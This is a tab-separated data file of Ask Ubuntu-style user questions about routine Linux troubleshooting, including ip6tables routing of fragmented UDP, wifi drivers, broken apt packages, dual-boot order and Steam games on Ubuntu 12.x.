256316	facing issue in ip6table rule for port based routing management	i have 4 machine setup , m1 - > m2 - > m3 | m4 . and a laptop that can be reachable through both m3 and m4 . m2 has 2 nic conected to m3 and m4 . now i want to divide the flow coming from m1 for laptop . at m2 , i have done following : ip6tables -t mangle -a prerouting -p udp âdport 80 -j mark âset-mark 12 echo 2 udp_flow > > /etc/iproute2/rt_tables ip -6 rule add fwmark 12 table udp_flow ip -6 route add laptop-ip dev eth2 table udp_flow now if i send udp traffic from m1 destined to laptop ip , then if packet size is less then 1410 bytes then i can see complete udp packets at m4 and successfully delivered to laptop . but if packet size > 1410 bytes , then fragmentaion happens and i can see only 1st fragmented packet at m4 , not successive fragmented packets . i searched and find out that only 1st fragmented packet have information of udp and destination port and hence marked properly and routed . other fragmented packets have only udp information not destination port , so not marked and dropped at m2 . is there any solution or rule that can be applied so that all packets ( whether fragmentation is there or not ) can transfer to m4 only not m3 ( destination port rule is compulsory ) ? if i put only udp rule not including destination port then there is no issue with both cases with/without fragmentation .
256317	can not get ubuntu to install correctly	i have been having numerous issues with trying to get ubuntu 12.10 to run properly , or for that matter , install . i am running it off of a bootable usb created by lili and i have tried a few other usb converters however i forget their names at the current and all have failed at an install . the first issue i came across is , from what i can tell , ubuntu does n't like windows 7 computers with uefi and with 3tb hdd . i 'm not exactly sure how to fix these issues and simply tried reinstalling it with a reformatted usb of ubuntu because i assumed originally that the problem lie within the original usb install . however , upon trying it a second and third time i can no longer access firefox as it goes to a black command prompt-esque screen which tells me about checksumming and seems to freeze there or it will go to the ubuntu login screen . this happens with amazon and firefox from what i 've tried so i assume it might be something with how it connects to the internet is messed up as well . i have n't been able to exactly find anything that helps me all too much as i am very new to the linux scene and am not familiar with most of the jargon as of yet so i would most likely need a very simply said explanation as to what i am to do to get it off the ground and installed properly , as the closest i 've gotten to getting it installed , is it asking whether i want dual boot or hdd override ( which i prefer dual boot if that helps guide me through this ) . thank you for reading this and i hope to find a few people who are able to figure out my issues as i have used every kind of method i could think of at the moment and am at a loss .
256320	hp 2000 wireless do n't work with ubuntu 12.10	i just got the last version 12.10-64bits , to install in my new hp 2000 , and everything went fine , including the efi installation in the original windows 8 platform ( i 've followed this tutorial https : //help.ubuntu.com/community/uefi ) . the only problem is that wifi do n't work . anyone has passed by the same problem ? if you need any information about the hardware , just tell me how i get it and i 'll get it . here goes the outputs : lspci : 07:00.0 network controller : ralink corp. device 3290 07:00.1 bluetooth : ralink corp. device 3298 08:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5229 pci express card reader ( rev 01 ) rfkill list all : 0 : hp-bluetooth : bluetooth soft blocked : yes hard blocked : no 1 : hp-wifi : wireless lan soft blocked : no hard blocked : no dmesg | grep -i firmware [ 0.305939 ] [ firmware bug ] : acpi : bios _osi ( linux ) query ignored [ 0.566226 ] [ firmware bug ] : acpi : no _bqc method , can not determine initial brightness [ 0.566570 ] [ firmware bug ] : acpi : no _bqc method , can not determine initial brightness [ 2.099004 ] [ firmware bug ] : acpi : no _bqc method , can not determine initial brightness sudo lshw -class network : *-network unclaimed description : network controller product : ralink corp. vendor : ralink corp. physical id : 0 bus info : pci @ 0000:07:00.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f0210000-f021ffff ifconfig : eth0 link encap : ethernet hwaddr 84:34:97:93:47 : a4 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1072 errors:0 dropped:0 overruns:0 frame:0 tx packets:1072 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:87792 ( 87.7 kb ) tx bytes:87792 ( 87.7 kb ) iwconfig : lo no wireless extensions
256322	startup error problem	i installed ubuntu with the windows installer , reboot laptop and choose ubuntu in startup options . but then the console said what windows can not be launched and asked for a disk with os . also it said : file : \ubuntu\winboot\wubildr.mbr condition : 0xs0000098 notes : ca n't load chosen record , because application 's missing or damaged . what should i do ?
256323	fstab . allow 2 users mount ntfs with passwd . deny other users . possible ?	i 've seen this answer , but it requires the partition to always be mounted ( and do the user access via group perms on the root fs that mounted the ntfs ) what i 'm hopping to be possible , is to allow only a couple users to initiate the mount of the partition . i will rarely have need to mount that partition , and leaving it mounted all the time is just asking for trouble on a portable that will be sleeping/waking/and moving a lot . is it possible ? something like : fstab : /dev/sda1 /windows ntfs noauto , user=usera , user=userb , rw 0 0 and ideally , requiring the user the type in the password to confirm . i have no idea what happens on the gui land ... but trying to learn . if this was a regular server , i 'd simply add them to sudoers with that mount point allowed . i think ultimately i will just make them 2 administrators of the machine . but i wanted to avoid that .
256327	will ubuntu do any damage to my files installed on windows ?	i have one drive on my computer which has windows 7 on it , i wan na try ubuntu to see what linux is like but i am worried about my stuff i did on windows .
256328	can not install any package using apt	it seems that some packages on my ubuntu ( ubuntu 10.04.4 lts , lucid ) are broken , preventing me from installing any new packages . i have gone through similar questions in this site , but all proves useless . the following are some commands i tried along with the outputs : 'sudo apt-get install -f ' or 'sudo apt-get -- fix-broken install ' : reading package lists ... building dependency tree ... reading state information ... 0 upgraded , 0 newly installed , 0 to remove and 44 not upgraded . 6 not fully installed or removed . after this operation , 0b of additional disk space will be used . setting up gcalctool ( 5.30.0.is.5.28.2-0ubuntu3 ) ... dpkg : error processing gcalctool ( -- configure ) : subprocess installed post-installation script returned error exit status 245 setting up shared-mime-info ( 0.71-1ubuntu2 ) ... segmentation fault dpkg : error processing shared-mime-info ( -- configure ) : subprocess installed post-installation script returned error exit status 139 setting up update-manager ( 1:0.134.12.1 ) ... dpkg : error processing update-manager ( -- configure ) : subprocess installed post-installation script returned error exit status 245 setting up vino ( 2.28.2-0ubuntu2.2 ) ... dpkg : error processing vino ( -- configure ) : subprocess installed post-installation script returned error exit status 245 no apport report written because maxreports is reached already setting up libgweather-common ( 2.30.0-0ubuntu1.1 ) ... dpkg : error processing libgweather-common ( -- configure ) : subprocess installed post-installation script returned error exit status 245 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libgweather1 : libgweather1 depends on libgweather-common ( > = 2.24.0 ) ; however : package libgweather-common is not configured yet . dpkg : error processing libgweather1 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already processing triggers for menu ... errors were encountered while processing : gcalctool shared-mime-info update-manager vino libgweather-common libgweather1 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) * 'sudo dkpg -- configure -a ' : setting up shared-mime-info ( 0.71-1ubuntu2 ) ... segmentation fault dpkg : error processing shared-mime-info ( -- configure ) : subprocess installed post-installation script returned error exit status 139 setting up gcalctool ( 5.30.0.is.5.28.2-0ubuntu3 ) ... dpkg : error processing gcalctool ( -- configure ) : subprocess installed post-installation script returned error exit status 245 setting up libgweather-common ( 2.30.0-0ubuntu1.1 ) ... dpkg : error processing libgweather-common ( -- configure ) : subprocess installed post-installation script returned error exit status 245 setting up vino ( 2.28.2-0ubuntu2.2 ) ... dpkg : error processing vino ( -- configure ) : subprocess installed post-installation script returned error exit status 245 setting up update-manager ( 1:0.134.12.1 ) ... dpkg : error processing update-manager ( -- configure ) : subprocess installed post-installation script returned error exit status 245 dpkg : dependency problems prevent configuration of libgweather1 : libgweather1 depends on libgweather-common ( > = 2.24.0 ) ; however : package libgweather-common is not configured yet . dpkg : error processing libgweather1 ( -- configure ) : dependency problems - leaving unconfigured processing triggers for menu ... errors were encountered while processing : shared-mime-info gcalctool libgweather-common vino update-manager libgweather1 hope somebody could help me out , thanks in advance ! [ edit ] : i finally solved the problem by re-installing the system . in fact , i do not need to re-install , but just re-pair the system with all the data kept intact .
256329	what gcc version do i need ?	i have installed ns-2.28 on ubuntu 12.04 . my kernel version is 3.2.0-29-generic-pae . what gcc version matches my ns-2.28 & 3.2.0-29-generic-pae ?
256344	can not login to my machine using the *right* password	here are the facts : i ran some stress-tests last night . i forgot to reset the logs to minimal . when i got this morning , i saw that hard drive is full /dev/sda1 . cleaned up the large file ( 350gb ) . i experienced the machine being a bit slowlier than usual . i rebooted the machine . since then , when i try to login , the computer shows as if it let me in , and yet , prompt for login again . if i provide the wrong password on purpose , it shows the usual error . when i provide the right one , it is like an infinite loop . when i hit ctrl+alt+f1 and login at tty1 , for instance , all works fine . from tty1 , i tried to setup auto-login as follows : sudo vim /etc/lightdm/lightdm.conf autologin-user= < username > autologin-user-timeout=0 yet , it does n't perform the auto login for some reason .
256346	how do i overcome the chm2pdf error in the description ?	the error is : err011 : unable to parse html element on line 13 ! pages : 2854 bytes : 9759142 something wrong happened when launching htmldoc . exit value : 256 check if output exists or if it is good . done . which i received from running chm2pdf -- webpage '/home/brentonhorne/drugs/chm/goodman and gillman.chm' i looked in the pdf generated and it had ÿøÿàjfifÿûc $ $ $ $ $ ' -- '7 ; 7llpÿûc '' $ '' ' -- '7 ; 7llfÿàxî '' ÿäÿä^ ! 1 '' a2qaq # brtbr¡²³ò36csst¢±ñ $ % 45u´áâó¿dcd£âããðeáñ & euòÿä ? óé , ãíé : «+ücã # ÿj¦sñòñ´vð£¹æè ÿò5fk»áo'ôúüc ÷ < ¦ôð³nà·8¡»ºha2éã4slkæ ; ¤vè±¬õ«xjì9þ-ÿf··¢gz«åmìê çº³²ü\ëþ : ê qê for the first page ( book cover ) . it also failed to render many images and equations , with a lot of text formatting lost ( many things that are bold in the original chm file are n't bold anymore ) . how do i overcome this problem ? i am running 32 bit 12.10 if it helps . chm2pdf_temp_work_dir=tempfile.mkdtemp ( ) chm2pdf_temp_orig_dir=tempfile.mkdtemp ( ) is located in the /usr/bin/chm2pdf python script .
256350	hide skype from panel with apparmor and keep links in chat openable	to hide skype from unity panel we can add file /etc/apparmor.d/usr.bin.skype with such content : # last modified : tue jun 12 03:49:49 2012 by izx # repository : http : //apparmor.test.opensuse.org/backend/api draglor 53 # additional profiling based on work by андрей калинин , lp : # 226624 # extremely simple profile for skype designed only to remove its panel # icon on ubuntu 12.04 by disabling access to the sni-qt library # this profile does not provide any other kind of security # include < tunables/global > /usr/bin/skype { # include < abstractions/x > # include < abstractions/audio > # include < abstractions/base > # include < abstractions/dbus-session > # include < abstractions/fonts > # include < abstractions/freedesktop.org > # include < abstractions/kde > # include < abstractions/nameservice > # include < abstractions/nvidia > # include < abstractions/user-tmp > # deny read access to the sni-qt libraries , thus removing the panel icon deny /usr/lib/i386-linux-gnu/qt4/plugins/systemtrayicon/libsni-qt.so r , deny /usr/lib/x86_64-linux-gnu/qt4/plugins/systemtrayicon/libsni-qt.so r , /** mrwkl , } and after reloading apparmor skype hides from panel . but ! after it links in skype chat become dead and does n't opens in browser ! how can i hide skype from unity panel with this workaround and keep links alive ?
256354	encountering problem in mozilla browser	in my mozilla browser when i open youtube it does n't play any video . although it does n't recommend any missing plugin to install , but just shows an error .
256359	how can i pause and download again from ubuntu software center	i 'm updating my ubuntu 12.04lts now . but my laptop battery is very low now so is it possible that now i can pause my download in the software center and start it again from the same position.how can i do this . please help me .
256364	windows not working properly	hey guys i booted into my windows 7 after a month and there is some error . not able to do any work on it properly . i dont have any problem in reinstalling windows but the issue is that it will overtake grub and i wont be able to boot into ubuntu . so let me know exact measures that i can take at the moment . will recovering my windows too overtake grup bootloader . note error in windows : error- file or directory c : \ $ mft is corrupt and unreadable . run chkdsk utility . wlmail.exe corrupt file . thanks
256365	dual boot woes and how to change the default order	i 'm afraid i was assuming that ubuntu ( 12.10 ) would be slightly easier to use and to tweak a little , however this is apparently not the case . i have a 750 gb hard disk in my asus laptop . 600 gb for windows and the rest for ubuntu . i had first installed windows and then added ubuntu afterwards . however this sets ubuntu to be the default boot system . that does n't strike me as being a good idea . i 'm the computer-aware one who can boot into a secondary system , but my wife wants it nice and simple and windows . so i was hoping to change the boot order . however instead of a simple utility , i was confronted with very complicated instructions . the first option was to change some grub.lst file , however i could n't find it . the second was to install grub customizer . this was however a major task , as i had to perform several terminal operations . i find this strange for what is supposedly such a friendly shell . anyway i did and then started the program , only to find it was n't exactly intuitive . the interface gave me the impression that i could move items up and down . so i moved the windows boot up until it was above the ubuntu boot and the several other ubuntu options . however the only effect of this was to remove windows entirely from the boot menu . it took me quite a few trials to find out that i now suddenly have to go into the ubuntu advanced options in order to get to windows . why ca n't i simply set a boot order ? with the accent on simply ?
256366	wireless not working	i have a dell laptop . i have installed ubuntu 12.10 . i m not able to get corrected to wifi . its not detecting any wireless drivers . i hv tried download many packages fronm software center but no use . n so is the problem with bluetooth . its written searchin devices . bt it is not detecting the device . my friend has also installed the same software with hp laptop and hhhe is able to access wireless directly . kindly help .
256373	wireless failed after ubuntu 12.04 updating	i am working on a dell precision m4700 laptop with ubuntu 12.04 and kde desktop . after a `` suggested '' system updating , my wireless connection has stopped working . knetworkmanager sees the wireless and tries to connect to it but , after a while , a small windows pops up and asks for a password . if i introduce the wireless one i have , it tries again but nothing happens . that window appears again and again asking for a password . such window has a key as a symbol on the top left corner , the same key appears over the knetworkmanager symbol which is on the bottom panel . the window has the title secretas de [ wireless name ] - service for kde- ( i am using spanish locale ) . i am sure the password is correct and the router is working fine , indeed , i am using another laptop to publish this thread using the same wireless connection . i also post some useful information : kernel : 3.2.0-37-generic desktop kde ubuntu 12.04.2 lts output of iwconfig : lo : no wireless extension eth1 : ieee 802.11abg essid off/any mode : managed access point : not-associated retry long limit:7 rts thr off fragment thr off power management : off eth0 : no wireless extension i update some information after your suggestions after ip a : 1 : lo : mtu 16436 qdisc noqueue state unknown link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo inet6 : :1/128 scope host valid_lft forever preferred_lft forever 2 : eth0 : mtu 1500 qdisc pfifo_fast state down qlen 1000 link/ether d4 : be : d9:82:0a:99 brd ff : ff : ff : ff : ff : ff 3 : eth1 : mtu 1500 qdisc pfifo_fast state dormant qlen 1000 link/ether a4:17:31:4b:52:6e brd ff : ff : ff : ff : ff : ff inet6 fe80 : :a617:31ff : fe4b:526e/64 scope link valid_lft forever preferred_lft forever sudo ip link set eth1 up : it 's not able to connect either ( yes i am using eth1 ) . information of the wireless card after lspci -nn | grep 0280 is : 03:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev01 ) hi , i tried the following : hardware switch on rfkill list all 0 : dell-wifi : wireless lan soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no 2 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no then , hardware switch off rfkill list all 0 : dell-wifi : wireless lan soft blocked : yes hard blocked : yes 1 : phy0 : wireless lan soft blocked : no hard blocked : no 2 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no finally i set the switch on again . the wireless is still not working . it sees the home lan and tries to connect again and again but it does not .
256374	ubuntu 12.04.2 lts vs. ubuntu 12.10 ?	should i pick ubuntu 12.04.2 lts or 12.10 for my home machine ? i know that ubuntu 12.04 is lts but 12.10 is newer . but what should i pick now ? can i use gnome 3 shell ( apt-get install gnome-shell ) without any problems in ubuntu or is it recommend to use unity ? greetings , majestro
256382	how to switch off graphics card ?	i am using ubuntu 12.04 in my hp laptop ( a8 processor ) , it is getting overheated when i use ubuntu , but when i use windows it stays cool . i want to switch off my graphics card in ubuntu . this has to be applied when i shutdown or restart . currently i 'm getting an error saying that gnome settings not responding and then it is taking long time to shutdown the system .
256387	recover encrypted data after reinstall	i could n't remember the password that i 've used for so many weeks , and changed it in recovery mode but for many reasons i decided to reinstall ubuntu 12.10 with my seperate /home folder intact and passphrase at hand so i can decrypt my old /home when reinstalled . now i that all is going well and ubuntu 12.10 is reinstalled i want to access my old data which during the installation process i have mounted at /backups . i 'm following this guide ; http : //hackerpublicradio.org/eps.php ? id=1101 . all seems fine until step 7 where it will be mounted at /tmp/ecryptfs.45lc2wif . when i go to this folder i can see several files and one folder , and in it a subfolder ( my username ) . main /tmp/ecryptfs.45lc2wif $ folder lost+found ( folder ) empec ( folder , my username ) .ecryptfs ( folder ) .directory ( link ( broken ) ) empec folder .cache ( folder ) access-your-private-data.desktop ( link to desktop configuration file ) readme.txt ( link to plain text document ) .ecryptfs ( link ( broken ) ) .private ( link ( broken ) ) the readme.txt notes this directory has been unmounted to protect your data . from the graphical desktop , click on : `` access your private data '' or from the command line , run : ecryptfs-mount-private when trying to open access-your-private-data.desktop , terminal opens and closes instantly . so nothing happens . and when executing ecryptfs-mount-private i get the following ; $ cd /tmp/ecryptfs.45lc2wif/ $ ecryptfs-mount-private error : encrypted private directory is not setup properly how do i access the encrypted files and move , delete or alter them ? thanks in advance ! i do not have the old password ( or atleast i think so ) . i have the old passphrase used to encrypt the /backups formerly /home [ updated ] changed step 5.3 into step 7 . problem remains the same .
256394	subwoofer is not working in dell inspiron 660 with ubuntu 12.10	i 've a `` dell inspiron 660 '' desktop pc with ubuntu 12.10 and subwoofer is not working . this is the audio device that have : 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 01:00.1 audio device : nvidia corporation device 0e1b ( rev a1 ) in sound settings i see this : i have tried to google for this problem and i have seen that other people just added these lines to /etc/pulse/daemon.conf enable-remixing = yes enable-lfe-remixing = yes default-sample-channels = 6 but it did n't work for me ( i of course restarted pulseaudio : sudo service pulseaudio restart ) . anyone knows how to fix this ? thank you so much ! i add more verbose informations about my audio device , i hope it can help : 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) subsystem : dell device 0581 flags : bus master , fast devsel , latency 0 , irq 46 memory at f7910000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 50 ] power management version 2 capabilities : [ 60 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ 70 ] express root complex integrated endpoint , msi 00 capabilities : [ 100 ] virtual channel capabilities : [ 130 ] root complex link kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 01:00.1 audio device : nvidia corporation device 0e1b ( rev a1 ) subsystem : nvidia corporation device 093d flags : bus master , fast devsel , latency 0 , irq 17 memory at f7080000 ( 32-bit , non-prefetchable ) [ size=16k ] capabilities : [ 60 ] power management version 3 capabilities : [ 68 ] msi : enable- count=1/1 maskable- 64bit+ capabilities : [ 78 ] express endpoint , msi 00 kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel
256400	touchscreen , webcam and screenlight not working !	i have an acer aspire v5 that came with windows 8 . now i have the ubuntu 12.10 , 32 bits . first , the command to dim or brighten the screen with -fn up or down- is acting on the screen ( it shows that it is dimming or increasing on the bar on the screen ) , but the screen does n't do so . second , my computer is a touchscreen , still working with ubuntu , but seems to be buggy a little bit from time to time . for example , it is supposed to be a one-finger scroll up or down . it acts like it on pdf files but not on the internet . i can not find anywhere in ubuntu how to program the settings of the touchscreen . are there any programs to download to do so , or is touchscreen support not in ubuntu yet ? it also goes nuts ( not frequently , but still ... ) as it closes the tabs or goes to the ubuntu purple page that shows the crypting things when i start my computer . then it goes right back to where i was on my page as if nothing had happened . last of all , my computer suddenly lost the web cam when i am using skype . the in-build cam in the laptop shows me a green light beside the cam but the video is all black . can not see anything . this has happened two days ago and can not understand why since it has been working since i got with ubuntu . those are my concerns . if anyone could help that would be much appreciated . peace
256402	why wo n't steam work on amd64 ?	i ca n't install steam on my ubuntu 12.04 64-bit . it says that it 's for `` i686 '' ; where can i get that ? i have tried to install it using the ubuntu software center and from the terminal . i have seen many videos on youtube about installing steam in ubuntu . why wo n't it install on my pc ?
256403	script to quit and restart nautilus does n't work	as i pointed out in my question nautilus theme problem in 12.04 i have to type 4 commands after every logon as workaround for a theming problem . since i did n't find a real solution i decided to put the commands into a script and my plan ist to make this script autostart once it works properly . the commands are : nautilus -q nautilus -n & gsettings set org.gnome.desktop.background show-desktop-icons false gsettings set org.gnome.desktop.background show-desktop-icons true and this is my script : # ! /bin/bash nautilus -q pid0= $ ( pgrep 'nautilus ' ) while [ -n `` $ pid '' ] ; do pid= $ ( pgrep 'nautilus ' ) sleep 0 done nautilus -n gsettings set org.gnome.desktop.background show-desktop-icons false gsettings set org.gnome.desktop.background show-desktop-icons true exit 0 i had to use the loop and testing since otherwise nautilus is restarted before it has finished to quit itself . but my script never ends . while pgrep nautilus entered manually in a terminal does n't return any value after nautilus -q , runing the script returns endless a pid so the script is n't executed . what is my mistake ? where does the pid come from when the command is run within the script ? and how can i restart nautilus from within the script avoiding nautilus to block the script forever from further execution ? the line nautilus -n starts nautilus and the script hangs from there on . using nautilus -n & instetead makes the script run , but the follwing commands are executed before nautilus has completely started so they dont't work as intended , desktop settings are not applied . are there any other ideas to cope with this annoying command-typing at every logon ?
256406	transferring ratings and playlists from rhythmbox to clementine	after the latest update , rhythmbox ( which was my main mp3 player on my ubuntu latest distro ) stopped functioning : it dies just after startup . so , i turned to clementine which i like a lot . however in rhythmbox i had my playlists and ratings . song ratings are very important to me because many of my auto-playlists are depending on them . is there anyway i can get my playlists and ratings from rhythmbox and add them to clementine ? thanks .
256412	wubi installation did not prompt me for username or password ; now i 'm stuck as a guest	i used the windows installer for ubuntu but it only lets me login as a guest . i think it is because it never prompted me for a username or password during installation . now , i obviously ca n't do anything that requires admin rights . how do i gain admin rights ?
256413	ca n't run tf2 on a radeon x1200	i 'm really new to ubuntu , so you have to be really patient with me . so , i installed ubuntu 12.10 two weeks ago . everything works , it 's kinda slow , but i think that's because of the ancient laptop i use . anyways ! i tried to install steam and team fortress 2 , but when i want to start the game , i get some errors about opengl not being properly installed or working . i tried to update the x.org drivers , but it 's no use . i 'm on a radeon x1200 / rs690m . so , does anybody have a clue ?
256416	how to fresh install ubuntu 12.04 without removing windows 7	i have both ubuntu and windows 7 on my computer . i want to fresh install ubuntu 12.04 . i want to remove older ubuntu and install ubuntu 12.04 without any changes on windows 7 . i know i can upgrade and all . but i decided i want fresh install . how can i do that ?
256417	text/fonts display garbled after hibernation resume	i have just installed ubuntu 12.04 lts as a primary ext4 partition ( as a sole os ) and set the swap partition over double my ram which was 3 gb ( swap partition is currently 10 gb ) . the thing that i just experienced is having the fonts and texts just garbled after resuming hibernation , i was wondering if there is an incompatibility with my graphic card driver or something else ? i have the intel gm45 display driver chipset for graphic ( further information below ) . *-display:0 description : vga compatible controller product : mobile 4 series chipset integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 07 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:45 memory : f6c00000-f6ffffff memory : e0000000-efffffff ioport : efe8 ( size=8 ) *-display:1 unclaimed description : display controller product : mobile 4 series chipset integrated graphics controller vendor : intel corporation physical id : 2.1 bus info : pci @ 0000:00:02.1 version : 07 width : 64 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=0 resources : memory : f6b00000-f6bfffff no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.2 lts release : 12.04 codename : precise linux amir-labtop 3.2.0-37-generic-pae # 58-ubuntu smp thu jan 24 15:51:02 utc 2013 i686 i686 i386 gnu/linux screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 8192 x 8192 lvds1 connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 344mm x 194mm 1366x768 60.0*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis )
256419	`` unable to find a medium containing a live file system ''	i 've installed ubuntu on my laptop , but when i open ubuntu , it says the following message ( initramfs ) unable to find a medium containing a live file system can anyone help ?
256422	how do i install avira ?	i 'm new to ubuntu and want detailed guidance on installing avira . i read the manual and did all the procedures but eventually the terminal says to me license has expired at 2012-09-12 . warning : no dazuko module available , on-access protection disabled .
256423	how to get rid of black lines in top screen [ ubuntu 12.10 ] ?	i have recently started with installing ubuntu 12.10 ( x64 ) next to my windows 8 ( x64 ) install . but since installing the amd proprietary drivers i got weird black horizontal lines in top of the screen . see the 11sec video i made with my phone to know exactly what i mean : http : //youtu.be/oulpuykpjj0 i had to install the proprietary drivers because with the opensource drivers i couldent login after first restart from fresh installation . i only got a black screen and a mouse . this are my specs : gigabyte ga-z68x-ud3h-b3 ( rev . 1.3 ) amd radeon hd 6950 dell ultrasharp u2312hm ( connected with dvi ) i currently run the latest beta drivers from amd , but with the stable i had the same problem.. the strange thing is when i boot the computer , i get the black lines . but i found out that when i log out , and log back in , the black lines are gone ! this however is not really an ideal situation . how can i fix this problem to completely get rid of these black lines ?
256431	play steam games with nvidia-optimus laptop ?	what is the best way to start a steam game in an nvidia optimus laptop with ubuntu 12.04 installed and the latest version of bumblebee installed ? if i call steam with optirun steam and then choose the game i want to play , i get the following error : the program 'hl2_linux ' received an x window system error . this probably reflects a bug in the program . the error was 'baddrawable ( invalid pixmap or window parameter ) ' . ( details : serial 125 error_code 9 request_code 14 minor_code 0 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the -- sync command line option to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . ) missing shutdown function for devshotgenerator_init ( ) : devshotgenerator_shutdown ( ) missing shutdown function for mapreslistgenerator_init ( ) : mapreslistgenerator_shutdown ( ) missing shutdown function for com_initfilesystem ( m_startupinfo.m_pinitialmod ) : com_shutdownfilesystem ( ) missing shutdown function for steam3client ( ) .activate ( ) : steam3client ( ) .shutdown ( ) /home/user/.local/share/steam/steamapps/user/team fortress 2/hl2.sh : line 72 : 20567 segmentation fault ( core dumped ) $ { game_debugger } `` $ { gameroot } '' / $ { gameexe } `` $ @ '' game removed : appid 440 `` team fortress 2 '' , procid 20567 saving roaming config store to 'sharedconfig.vdf' roaming config store 2 saved successfully ^c [ 68042.116376 ] [ warn ] received interrupt signal . if i run steam without the optirun option , i can go a little further into running the game , hearing the starting music on a black screen , but still fails later on in the process . should i call the game i want to play with a special optirun command instead of optirun steam ?
256433	how can i get access to the folder that i 've copied to /opt ?	i 've just copied a folder named journey to the /opt directory of home folder using the following command : sudo cp -r '/media/b60eb9810eb93b67/xampp/htdocs/journey/ ' '/opt/lampp/htdocs' now i ca n't open the folder journey . it says : you are not the owner . how can i get full access to this folder ?
256435	team fortress 2 ( tf2 ) incomplete graphics	after starting steam with `` force_s3tc_enable=true steam '' then stating tf2 game , the screen was the following : 1 ) black screen 2 ) green screen 3 ) shift+tab valve popup 4 ) black screen ( long time ) 5 ) incomplete tf2 menu sceen ( http : //postimage.org/image/54kcppty7/ ) 6 ) i even could leave the game ( http : //postimage.org/image/z236v5rdj/ ) '' any suggestions on how to solve it ? ''
256436	libqt4-dbus 4:4.8.1-0ubuntu4.4 installation complaining about wrong version it relies on	i am running ubunut 12.04 . today a software updater told me to install a few libqt4 packages which i did . i got the problem below which i think other people might have after today . trying to install this new package libqt4-dbus 4:4.8.1-0ubuntu4.4 that came from the update manager . it gives an error though because of dependencies . this is the exact error broken down libqt4-dbus : depends : libqt4-xml ( = 4:4.8.1-0ubuntu4.3 ) but 4:4.8.1-0ubuntu4.4 is installed depends : libqtcore4 ( = 4:4.8.1-0ubuntu4.3 ) but 4:4.8.1-0ubuntu4.4 is installed recommends : qdbus ( = 4:4.8.1-0ubuntu4.3 ) from looking at ubuntu website http : //packages.ubuntu.com/precise/libqt4-dbus libqt4-dbus 4:4.8.1-0ubuntu4.4 relies on 4:4.8.1-0ubuntu4.4 software and not on 4:4.8.1-0ubuntu4.3 software . why is the installer saying it relies on a lower version ? also is i thought 4:4.8.1-0ubuntu4.4 would be compatible with with 4:4.8.1-0ubuntu4.3 since it would be backward thanks for the reply . that output is confusing then if it is trying to say what your said . i think they should remove the word `` but '' from it . that is what makes me think it is looking for the older version . i checked the packages and they are the latest software for evverything . ii libqt4-xml 4:4.8.1-0ubuntu4.4 qt 4 xml module that output is confusing then if it is trying to say what your said . i think they should remove the word `` but '' from it . that is what makes me think it is looking for the older version . i checked the packages and they are the latest software . ii libqt4-xml 4:4.8.1-0ubuntu4.4 qt 4 xml module ii libqt4-xml : i386 4:4.8.1-0ubuntu4.4 qt 4 xml module ii libqtcore4 4:4.8.1-0ubuntu4.4 qt 4 core module ii libqtcore4 : i386 4:4.8.1-0ubuntu4.4 ii libqt4-xml : i386 4:4.8.1-0ubuntu4.4 qt 4 xml module ii libqtcore4 4:4.8.1-0ubuntu4.4 qt 4 core module ii libqtcore4 : i386 4:4.8.1-0ubuntu4.4 so in the sentence above for libqt4-xml it is correct in saying that 4:4.8.1-0ubuntu4.4 version is installed . not sure why it would say that an older version is available when the newest version is installed . libqt4-dbus : depends : libqt4-xml ( = 4:4.8.1-0ubuntu4.3 ) but 4:4.8.1-0ubuntu4.4 is installed
256438	how can i configure a cisco router via the console using ubuntu 12.04 lts ?	how can i configure a cisco router via the console using ubuntu 12.04 lts . i installed minicom but on attaching the console cable to the comport i do not see any router prompt like would happen when connected from a windows machine using putty .
256439	ubuntu runnung painfully slow and hot on laptop	i just installed ubuntu 12.10 and my laptop gets really really high temperatures ( havent measured yet but it is like if it was running a demanding game ) and runs painfully slow after a couple of minutes of use , freezing from time to time until it freezes completely and i have to shut down . im also running windows and that works fine , fast and cold , so there must be a solution for ubuntu better . specs : hp dv6-6185la -intel i7-2630qm -amd radeon 6770m ( switchable graphics ) -6gb ram -750 hdd ( 5400rpm )
